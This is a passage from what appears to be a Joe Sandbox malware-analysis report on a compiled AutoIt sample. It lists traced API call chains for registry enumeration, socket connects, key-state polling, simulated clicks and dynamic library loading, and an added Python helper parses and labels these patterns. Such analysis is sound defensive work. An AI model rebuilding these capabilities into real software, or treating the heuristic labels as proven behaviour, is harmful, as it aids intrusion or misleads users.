                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 003B077D
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 003B079B
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 003B07E1
                                                                  • FreeLibrary.KERNEL32(00000000,00000004), ref: 003B07FB
                                                                    • Part of subcall function 0036E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0039A574,?,?,00000000,00000008), ref: 0036E675
                                                                    • Part of subcall function 0036E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0039A574,?,?,00000000,00000008), ref: 0036E699
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 327935632-0
                                                                  • Opcode ID: 076e9008ddeb719165ab60f51dc4802b516bc7c225389de68ad0fc0ca5bb46cd
                                                                  • Instruction ID: 64474a7b8ad48106a6d8b8a9e238ae91ca4c0e03240c23c6f7161c2449010089
                                                                  • Opcode Fuzzy Hash: 076e9008ddeb719165ab60f51dc4802b516bc7c225389de68ad0fc0ca5bb46cd
                                                                  • Instruction Fuzzy Hash: 2C512979A00205DFCB16EFA8C481DAEB7B5FF49314F058055EA16AB361DB30EE45CB80
                                                                  APIs
                                                                    • Part of subcall function 003B3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003B2BB5,?,?), ref: 003B3C1D
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003B2EEF
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003B2F2E
                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003B2F75
                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 003B2FA1
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 003B2FAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                  • String ID:
                                                                  • API String ID: 3740051246-0
                                                                  • Opcode ID: ecea6d126bc6cf8197297dc51996b8f80627e33b7635bc16ba37496a67faeb39
                                                                  • Instruction ID: 1e5ea61c1def52e4e14359d22ab9172f065ccd9c53afe893915d17d6db2d5e77
                                                                  • Opcode Fuzzy Hash: ecea6d126bc6cf8197297dc51996b8f80627e33b7635bc16ba37496a67faeb39
                                                                  • Instruction Fuzzy Hash: CE514C71218304AFD706EF54C885EABB7F9BF88708F00491DFA559B2A1DB70E909CB52
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e6594a07ebce393f1d4b53e3086226e43896c3f3dedfd4469b3c3658ef502b6e
                                                                  • Instruction ID: 16ec69ca1bc50fa6df9137fb60761d600e954ecb62b87b24822b0fd3ef195d4f
                                                                  • Opcode Fuzzy Hash: e6594a07ebce393f1d4b53e3086226e43896c3f3dedfd4469b3c3658ef502b6e
                                                                  • Instruction Fuzzy Hash: 4C41D439911204EFC732DF68CC44FE9BB68EB09314F165269FA69A76E1C730AD01DA90
                                                                  APIs
                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003A12B4
                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003A12DD
                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003A131C
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003A1341
                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003A1349
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 1389676194-0
                                                                  • Opcode ID: e58198fbc4a52c666a08f0108fd7ae65f55131c60cf26154ada4611a14f5e675
                                                                  • Instruction ID: e6a1e3573f14eea6b6bb44cafcb80372715cbb3c6845942dbc543aff993992ba
                                                                  • Opcode Fuzzy Hash: e58198fbc4a52c666a08f0108fd7ae65f55131c60cf26154ada4611a14f5e675
                                                                  • Instruction Fuzzy Hash: 2B410839A00505DFCF02EF64C981AAEBBF5EF09315B148099E90AAF3A1CB31ED05DB50
                                                                  APIs
                                                                  • GetCursorPos.USER32(000000FF), ref: 0036B64F
                                                                  • ScreenToClient.USER32(00000000,000000FF), ref: 0036B66C
                                                                  • GetAsyncKeyState.USER32(00000001), ref: 0036B691
                                                                  • GetAsyncKeyState.USER32(00000002), ref: 0036B69F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                  • String ID:
                                                                  • API String ID: 4210589936-0
                                                                  • Opcode ID: 9b26ba0a3769ae25aa10fc2d754a3830c48bf0f3d819c13f540f7e0eb5dd82ba
                                                                  • Instruction ID: 2bb7a9898022064173d842b06ffd376ed8e4dc93a40a32deb728cfb13edc7bb3
                                                                  • Opcode Fuzzy Hash: 9b26ba0a3769ae25aa10fc2d754a3830c48bf0f3d819c13f540f7e0eb5dd82ba
                                                                  • Instruction Fuzzy Hash: EC413D35508119BBDF169F64C844EE9FBB9FB05324F10836AF829D6294CB30AD94DFA1
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 0038B369
                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 0038B413
                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0038B41B
                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 0038B429
                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0038B431
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePostSleep$RectWindow
                                                                  • String ID:
                                                                  • API String ID: 3382505437-0
                                                                  • Opcode ID: 2f2c74c545ad6e80d1960adea80c86f41cc4c4faff26ab9188c8133d7add1e39
                                                                  • Instruction ID: 855fc9d22dcf24c1547b20967e7f91504e6bdda1b6dd28b3a06f897b43914ce6
                                                                  • Opcode Fuzzy Hash: 2f2c74c545ad6e80d1960adea80c86f41cc4c4faff26ab9188c8133d7add1e39
                                                                  • Instruction Fuzzy Hash: 8E31BF7190031AEBDF05DF68DD4DA9EBBB9EB04315F114269F921AB2D1C3B0D954CB90
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 0038DBD7
                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0038DBF4
                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0038DC2C
                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0038DC52
                                                                  • _wcsstr.LIBCMT ref: 0038DC5C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                  • String ID:
                                                                  • API String ID: 3902887630-0
                                                                  • Opcode ID: 6386c7670700d53bdf6ab7b77083b9a68114c085cf284df3138c57d5bff45f97
                                                                  • Instruction ID: 46f900bcebdeb2acbc85ff4914da056659df14e58a5b0e0a7d40350396b57abf
                                                                  • Opcode Fuzzy Hash: 6386c7670700d53bdf6ab7b77083b9a68114c085cf284df3138c57d5bff45f97
                                                                  • Instruction Fuzzy Hash: A321D772204204BBEB176B39AC49E7B7BBCDF45750F11806AF90ADA191EAA1DC41D3A0
                                                                  APIs
                                                                    • Part of subcall function 0036B34E: GetWindowLongW.USER32(?,000000EB), ref: 0036B35F
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 003BDEB0
                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 003BDED4
                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 003BDEEC
                                                                  • GetSystemMetrics.USER32(00000004), ref: 003BDF14
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,003A3A1E,00000000), ref: 003BDF32
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long$MetricsSystem
                                                                  • String ID:
                                                                  • API String ID: 2294984445-0
                                                                  • Opcode ID: f41ff94551531f22e2f563f24b4ec6ff3f451f4dd6fa347f389a71d7b9d5bb10
                                                                  • Instruction ID: 39d352bd8a471487c72d75352340d5bd19a9941cd1236e82ab5cad67c36d996d
                                                                  • Opcode Fuzzy Hash: f41ff94551531f22e2f563f24b4ec6ff3f451f4dd6fa347f389a71d7b9d5bb10
                                                                  • Instruction Fuzzy Hash: A621C431615216AFCB224F789C44BB637A8FB15338F160335FA26CA9E0E730D850CB80
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0038BC90
                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0038BCC2
                                                                  • __itow.LIBCMT ref: 0038BCDA
                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0038BD00
                                                                  • __itow.LIBCMT ref: 0038BD11
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$__itow
                                                                  • String ID:
                                                                  • API String ID: 3379773720-0
                                                                  • Opcode ID: 4aa91d71f7dc3f3fd0be7cd90c5e4e63a0534bb28ea2041f2a5e2079461143a2
                                                                  • Instruction ID: 6177564a72578a65ea4e04e54c9fb232d6c0199f409f40f138ea08ae85de74da
                                                                  • Opcode Fuzzy Hash: 4aa91d71f7dc3f3fd0be7cd90c5e4e63a0534bb28ea2041f2a5e2079461143a2
                                                                  • Instruction Fuzzy Hash: 0521D4316407087BDB22BE658C46FDEBB6DAF4A310F000065F905EF191EB608A0987A1
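The function records above list raw call sequences with numeric arguments only: SendMessageW with uMsg 0000000E/0000000D (WM_GETTEXTLENGTH/WM_GETTEXT), PostMessageW with 00000201/00000202 (WM_LBUTTONDOWN/WM_LBUTTONUP), a LoadLibraryW/GetProcAddress/FreeLibrary chain, and so on. As an added triage helper, not part of the Joe Sandbox report or of the analysed sample, the Python below parses records in exactly this text layout, decodes the message constants, and flags a few call-sequence patterns. The pattern labels are the editor's own heuristics, not Joe Sandbox signatures, and the embedded input is a short excerpt of the records shown above. One caveat when reading the labels: the module at 00350000 is, for a compiled AutoIt script, largely the interpreter runtime, so a flagged sequence reflects a capability the runtime exposes (the ControlClick, WinGetText and DllCall style helpers) rather than proof that the embedded script calls it.

```python
"""Added triage helper (not part of the Joe Sandbox report or of the sample): parse the
'APIs' function records above, decode window-message arguments, flag call-sequence patterns."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Matches "• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0038DBF4" and the
# argument-less CRT form "• _wcsstr.LIBCMT ref: 0038DC5C"; subcall lines carry a prefix.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

# uMsg values seen in the listings (WinUser.h / CommCtrl.h constants).
MESSAGES = {0x000D: "WM_GETTEXT", 0x000E: "WM_GETTEXTLENGTH", 0x0201: "WM_LBUTTONDOWN",
            0x0202: "WM_LBUTTONUP", 0x1004: "LVM_GETITEMCOUNT", 0x102C: "LVM_GETITEMSTATE"}
SEND_POST = {"SendMessageW", "SendMessageA", "PostMessageW", "PostMessageA"}

@dataclass
class Call:
    name: str
    module: str
    args: List[Optional[int]]   # None where the tracer printed '?'
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # callee function address for "Part of subcall" lines

def parse_arg(token: str) -> Optional[int]:
    """Arguments are 8-digit hex, '-' prefixed when negative, '?' when unknown."""
    token = token.strip()
    if token in ("", "?"):
        return None
    return -int(token[1:], 16) if token.startswith("-") else int(token, 16)

def parse_records(text: str) -> List[List[Call]]:
    """One list of Calls per record; a record runs from a bare 'APIs' line to 'Memory Dump Source'."""
    records, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            records.append(current)
        elif stripped == "Memory Dump Source":
            current = None
        elif current is not None and (m := API_RE.match(line)):
            raw = m.group("args")
            args = [parse_arg(a) for a in raw.split(",")] if raw is not None else []
            subfn = int(m.group("subfn"), 16) if m.group("subfn") else None
            current.append(Call(m.group("name"), m.group("module"), args, int(m.group("ref"), 16), subfn))
    return records

def api_names(rec: List[Call]) -> List[str]:
    return [c.name for c in rec]

def messages_sent(rec: List[Call]) -> List[str]:
    """Symbolic uMsg (2nd argument) of each SendMessage/PostMessage call, in call order."""
    return [MESSAGES.get(c.args[1], f"0x{c.args[1]:04X}") for c in rec
            if c.name in SEND_POST and len(c.args) > 1 and c.args[1] is not None]

def classify(rec: List[Call]) -> List[str]:
    """Editor's heuristic labels for call sequences; not Joe Sandbox signatures."""
    names, msgs, labels = set(api_names(rec)), set(messages_sent(rec)), []
    if names & {"LoadLibraryW", "LoadLibraryA", "LoadLibraryExW"} and "GetProcAddress" in names:
        labels.append("dynamic-api-resolution")
    if {"WM_GETTEXTLENGTH", "WM_GETTEXT"} <= msgs:
        labels.append("window-text-read")
    if {"WM_LBUTTONDOWN", "WM_LBUTTONUP"} <= msgs:
        labels.append("synthetic-left-click")
    if {"RegOpenKeyExW", "RegEnumKeyExW"} <= names:
        labels.append("registry-key-enumeration")
    if {"GetAsyncKeyState", "GetCursorPos"} <= names:
        labels.append("mouse-state-poll")
    return labels

# Constructed input: an excerpt of the records shown above, in the report's text layout.
SAMPLE = """\
APIs
  • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
• LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 003B06EE
• GetProcAddress.KERNEL32(00000000,?), ref: 003B077D
• FreeLibrary.KERNEL32(00000000,00000004), ref: 003B07FB
Memory Dump Source
APIs
• PostMessageW.USER32(?,00000201,00000001), ref: 0038B413
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0038B41B
• PostMessageW.USER32(?,00000202,00000000), ref: 0038B429
Memory Dump Source
APIs
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0038DBF4
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0038DC2C
• _wcsstr.LIBCMT ref: 0038DC5C
Memory Dump Source
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(" -> ".join(api_names(rec)), "|", messages_sent(rec), "|", classify(rec))
```

Run it against the full report text (copy the records into SAMPLE or read a saved copy of the page) to get one line per function with its call chain, the decoded messages and any labels; records with no label still print their chain, so nothing is hidden by the heuristics.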
                                                                  APIs
                                                                    • Part of subcall function 003550E6: _wcsncpy.LIBCMT ref: 003550FA
                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?,003960C3), ref: 00396369
                                                                  • GetLastError.KERNEL32(?,?,?,003960C3), ref: 00396374
                                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003960C3), ref: 00396388
                                                                  • _wcsrchr.LIBCMT ref: 003963AA
                                                                    • Part of subcall function 00396318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003960C3), ref: 003963E0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                  • String ID:
                                                                  • API String ID: 3633006590-0
                                                                  • Opcode ID: 4e7c2c0d3530fc71f29b7bdb2222b57ff5b1a91e512be8fea79e99b4eaed4696
                                                                  • Instruction ID: 5ae59e3e3ba9aac0527efef2f5e980b1ef9d22225d6aa1246dd2ee71e202f9c2
                                                                  • Opcode Fuzzy Hash: 4e7c2c0d3530fc71f29b7bdb2222b57ff5b1a91e512be8fea79e99b4eaed4696
                                                                  • Instruction Fuzzy Hash: 7021D5355062159BEF27AB78AC83FFA33ACEF053A0F10446AF055D70E0EB60DD849A55
                                                                  APIs
                                                                    • Part of subcall function 003AA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 003AA84E
                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003A8BD3
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 003A8BE2
                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 003A8BFE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastconnectinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 3701255441-0
                                                                  • Opcode ID: ec51f269118e75d9ce8db446d10636c47902c7318d793be5498428c88caaa7ac
                                                                  • Instruction ID: c35a06f8eaced34d2d228373128cd633a669b20e56f575e3aa83224d0b6a8a4e
                                                                  • Opcode Fuzzy Hash: ec51f269118e75d9ce8db446d10636c47902c7318d793be5498428c88caaa7ac
                                                                  • Instruction Fuzzy Hash: 812190313006149FCB12AF68DC85F7EB7ADEF49720F058459F916AB2A2CB74AC018B61
                                                                  APIs
                                                                  • IsWindow.USER32(00000000), ref: 003A8441
                                                                  • GetForegroundWindow.USER32 ref: 003A8458
                                                                  • GetDC.USER32(00000000), ref: 003A8494
                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 003A84A0
                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 003A84DB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ForegroundPixelRelease
                                                                  • String ID:
                                                                  • API String ID: 4156661090-0
                                                                  • Opcode ID: f3beca4fb0d4cdaf2e43fb19151391446ceadc7ccd6c28a256a64e18b3e89321
                                                                  • Instruction ID: 25d486b66c06963cdb34c4c35ef231bbba774979639e14fac9519e9478f024ea
                                                                  • Opcode Fuzzy Hash: f3beca4fb0d4cdaf2e43fb19151391446ceadc7ccd6c28a256a64e18b3e89321
                                                                  • Instruction Fuzzy Hash: 6321A435A01204AFD705DFA5DD85A6EB7E9EF49301F048479E8499B251CF70EC04CB90
                                                                  APIs
                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0036AFE3
                                                                  • SelectObject.GDI32(?,00000000), ref: 0036AFF2
                                                                  • BeginPath.GDI32(?), ref: 0036B009
                                                                  • SelectObject.GDI32(?,00000000), ref: 0036B033
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                  • String ID:
                                                                  • API String ID: 3225163088-0
                                                                  • Opcode ID: b847b61b105446cdc91ed6fe400f0374df83b1a11d33a3afdc90a96202cef916
                                                                  • Instruction ID: 37cc543098e7dcfa21fe0b744cf395290dfcfbd311813f568ea3091088855429
                                                                  • Opcode Fuzzy Hash: b847b61b105446cdc91ed6fe400f0374df83b1a11d33a3afdc90a96202cef916
                                                                  • Instruction Fuzzy Hash: 6E217FB0901205EFDB12DF55EC88BEE7B6CBB10355F14C22AE621A61B8C3715891CF95
                                                                  APIs
                                                                  • __calloc_crt.LIBCMT ref: 003721A9
                                                                  • CreateThread.KERNEL32(?,?,003722DF,00000000,?,?), ref: 003721ED
                                                                  • GetLastError.KERNEL32 ref: 003721F7
                                                                  • _free.LIBCMT ref: 00372200
                                                                  • __dosmaperr.LIBCMT ref: 0037220B
                                                                    • Part of subcall function 00377C0E: __getptd_noexit.LIBCMT ref: 00377C0E
                                                                  Memory Dump Source
